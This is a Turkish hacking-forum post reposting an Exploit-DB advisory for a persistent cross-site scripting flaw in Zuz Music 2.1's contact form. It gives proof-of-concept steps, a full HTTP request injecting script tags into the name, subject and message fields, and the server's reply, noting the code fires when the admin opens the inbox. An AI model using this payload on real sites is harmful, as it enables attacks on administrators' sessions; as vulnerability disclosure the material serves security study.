Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 20-02-2019 20:38   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting



# Exploit Title/Exploit Başlığı:Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Dork: N/A
# CVE: N/A
# Date/Tarih: 14 Şubat 2019
# Exploit Author/Exploit Yazarı: Deyaa Muhammad
# Vendor Homepage/Yapımcı Sitesi: https://zuz.host/
# Software Link/Yazılımın Linki: https://codecanyon.net/item/zuz-musi...ystem/21633476
# Version/Versiyon: 2.1
# Tested on/Test Edilen Sistem: WIN7_x68/Linux

# POC:
1. Buraya gidin https://[PATH]/contact
2. Javascript kodunu yapıştırın.
3. Enjekte edilen bu kod admin mail kutusunu açtığı an çalışmaya başlayacaktır.
https://demos.zuz.host/gmusic/admin/inbox.

# Request/İstek:
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection/Bağlantı: close
Content-Length/Bağlantı Uzunluğu: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0

{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<scr ipt>alert(1)</script>","message":"<script>alert(2)</script>"}

#Response/Yanıt

HTTP/1.1 200 OK
Date/Tarih: Cuma, 15 Şubat 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type/İçerik Tipi: application/json
Content-Length/İçerik Uzunluğu: 183

{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}



Exploit Linki:
https://www.exploit-db.com/exploits/46420



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE


Konu BAGAY tarafından (20-02-2019 20:49 Saat 20:49 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ibobaba27 Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau